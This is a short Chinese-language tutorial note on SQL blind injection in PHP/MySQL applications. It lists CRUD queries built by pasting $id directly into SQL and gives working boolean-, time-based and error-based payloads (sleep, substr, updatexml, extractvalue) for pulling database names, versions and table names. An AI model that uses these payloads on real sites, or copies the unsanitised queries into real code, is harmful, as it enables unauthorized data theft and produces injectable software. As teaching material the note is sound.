-PHP 应用SQL 盲注布尔回显延时判断报错处理增删改查方式
#PHP-MYSQL-SQL
操作
-
增删改查
1
、功能:数据查询(对数据感兴趣)
查询:
SELECT * FROM news where id=$id
2
、功能:新增用户,添加新闻等(对操作的结果感兴趣)
增加:
INSERT INTO news (
字段名
) VALUES (
数据
)
3
、功能:删除用户,删除新闻等
删除:
DELETE FROM news WHERE id=$id
4
、功能:修改用户,修改文章等
修改:
UPDATE news SET id=$id
#PHP-MYSQL-
注入函数
-
布尔
&
报错
&
延迟
盲注就是在注入过程中,获取的数据不能回显至前端页面。
我们需要利用一些方法进行判断或者尝试,这个过程称之为盲注。
解决:常规的联合查询注入不行的情况
我们可以知道盲注分为以下三类:
1
、基于布尔的
SQL
盲注
-
逻辑判断
regexp,like,ascii,left,ord,mid
2
、基于时间的
SQL
盲注
-
延时判断
if,sleep
3
、基于报错的
SQL
盲注
-
报错回显
floor
,
updatexml
,
extractvalue
延迟:(不需要有回显和报错)
and sleep(1);
and if(1>2,sleep(1),0);
and if(1<2,sleep(1),0);
布尔:(需要有回显 不需要报错)
and length(database())=7;
and left(database(),1)='p';
and left(database(),2)='pi';
and substr(database(),1,1)='p';
and substr(database(),2,1)='i';
and ord(left(database(),1))=112;
报错:(需要有报错 不需要有回显)
and updatexml(1,concat(0x7e,(SELECT version()),0x7e),1)
and extractvalue(1, concat(0x5c, (select table_name from
information_schema.tables limit 1)));
更多:
https://www.jianshu.com/p/bc35f8dd4f7c
